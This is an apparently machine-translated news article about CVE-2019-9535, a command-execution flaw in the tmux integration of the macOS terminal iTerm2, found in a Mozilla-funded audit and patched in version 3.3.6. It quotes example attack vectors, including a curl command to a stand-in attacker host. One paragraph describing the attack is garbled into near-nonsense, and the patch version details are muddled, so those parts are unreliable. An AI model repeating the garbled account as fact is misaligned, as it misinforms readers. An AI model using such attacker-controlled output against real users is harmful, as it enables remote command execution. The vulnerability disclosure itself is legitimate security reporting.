Critical Security Bug Found In Popular macOS Terminal App iTerm2, Patch Now Available

Popular terminal emulator, iTerm2 , which is widely used by developers and system administrators, and many people even use it to process som...

Popular terminal emulator, iTerm2, which is widely used by developers and system administrators, and many people even use it to process some untrusted data, thus, MOSS (Mozilla Open Source Support Program) chose iTerm2 this time, then entrusted ROS (Radically Open Security, funded by MOSS) for security audit work.


It turns out that ROS discovered a critical security vulnerability in the widely used macOS terminal emulator, it is known that this vulnerability has been in iTerm2 for 7 years and is currently assigned the code CVE-2019-9535. This vulnerability could allow an attacker to execute commands on a user's computer.

ROS provides an attack example whereby video content is deliberately intended to convey logical proof so that when a user connects to a malicious SSH server, even though the attacker only demonstrates an unrestricted computer software, it's able to perform various malicious instructions.
During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.
Mozilla noted that this vulnerability requires a certain degree of interaction with the user before the attacker can execute subsequent attacks, but is considered to have a high potential security risk due to attacks that are generally considered harmless. Now Mozilla, ROS and iTerm2 developers have been working closely together to release the new 3.3.6 update, and the 3.3.5 security patch has also been made available.

Mozilla said that although the software would proactively trigger for updates. they expect developers to actively send out updates and reduce the chances of being targeted.

COMMENTS

Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content